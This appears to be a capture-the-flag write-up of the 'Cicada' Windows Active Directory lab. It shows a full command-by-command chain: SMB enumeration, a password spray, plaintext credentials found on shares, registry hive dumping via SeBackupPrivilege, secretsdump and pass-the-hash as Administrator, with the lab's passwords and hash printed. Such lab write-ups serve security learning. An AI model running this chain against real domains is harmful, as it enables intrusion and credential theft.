~/writeups/Cicada
Easy Windows Active Directory
Cicada.
Easy Windows Active Directory SMB Password Spray secretsdump
Easy Windows Active Directory machine. Anonymous SMB access exposes an HR notice with a default password. Password spraying identifies the valid user, whose credentials are later found in a backup script on a share — leading to a full domain compromise via secretsdump.
User Flag
obtained via emily.oscars
Root Flag
obtained via Administrator hash
01Reconnaissance

Full port scan reveals a standard Windows AD target — DNS, Kerberos, LDAP, SMB, WinRM. Clock skew of +7h noted for any future Kerberos operations.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.231.149 PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 389/tcp open ldap Domain: cicada.htb 445/tcp open microsoft-ds 5985/tcp open http WinRM |_clock-skew: mean: 7h00m01s
finding: standard AD stack. SMB on 445 and WinRM on 5985 are the primary attack surface. +7h clock skew noted.
02SMB Enumeration

Anonymous SMB access is enabled. The HR share contains a notice to new hires with a default password in plaintext. The DEV share contains a PowerShell backup script with hardcoded credentials.

SMB shares
$ nxc smb 10.129.231.149 -u guest -p '' --shares HR READ DEV READ IPC$ READ $ smbclient //10.129.231.149/HR -N smb: \> get "Notice from HR.txt"

The HR notice reveals the default password for new hires:

Notice from HR.txt
Dear new hire! Your default password is: Cicada$M6Corpb*@Lp#nZp!8 Please change it on first login.

Now enumerate domain users via RID brute-force to build a spray target list:

RID brute
$ nxc smb 10.129.231.149 -u guest -p '' --rid-brute 500: CICADA\Administrator 501: CICADA\Guest 502: CICADA\krbtgt 1104: CICADA\john.smoulder 1105: CICADA\sarah.dantelia 1106: CICADA\michael.wrightson 1108: CICADA\david.orelious 1109: CICADA\emily.oscars
finding: 5 domain users enumerated. Default password from HR notice ready to spray.
03Password Spray

Spray the default password against all enumerated users. Only one account hasn't changed it yet.

password spray
$ nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success CICADA\john.smoulder [-] STATUS_LOGON_FAILURE CICADA\sarah.dantelia [-] STATUS_LOGON_FAILURE CICADA\michael.wrightson [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 CICADA\david.orelious [-] STATUS_LOGON_FAILURE CICADA\emily.oscars [-] STATUS_LOGON_FAILURE

With michael.wrightson credentials, enumerate the DEV share — a PowerShell backup script leaks emily.oscars's password in plaintext:

Backup_script.ps1
$ smbclient //10.129.231.149/DEV -U 'michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8' smb: \> get Backup_script.ps1 # Contents: $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
credentials: emily.oscars : Q!3@Lp#M6b*7t*Vt
04Foothold — WinRM as emily.oscars

emily.oscars is a member of the Backup Operators group — a privileged group that can read any file including the SAM and SYSTEM hives.

evil-winrm
$ evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' *Evil-WinRM* PS C:\Users\emily.oscars\Desktop> type user.txt 3d5b2a************************
user flag obtained.
05Privilege Escalation — Backup Operators → secretsdump

Members of Backup Operators have SeBackupPrivilege — they can copy any file bypassing ACLs, including the registry hives. Dump SAM and SYSTEM, then use secretsdump locally to extract the Administrator hash.

dump hives
# dump registry hives (SeBackupPrivilege allows this) *EWR* reg save HKLM\SAM C:\Temp\sam.hive *EWR* reg save HKLM\SYSTEM C:\Temp\system.hive # download to attacker *EWR* download C:\Temp\sam.hive *EWR* download C:\Temp\system.hive
secretsdump
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator NT hash: 2b87e7c93a3e8a0ea4a581937016f341
06Root Flag

Pass-the-Hash with the Administrator NT hash for a full domain shell.

PTH → root
$ evil-winrm -i 10.129.231.149 -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341' *EWR* type C:\Users\Administrator\Desktop\root.txt a98dee7************************
chain: SMB guest → HR default password → spray → michael.wrightson → DEV share → emily.oscars creds → Backup Operators → SeBackupPrivilege → secretsdump → Administrator PTH
← all writeups EscapeTwo →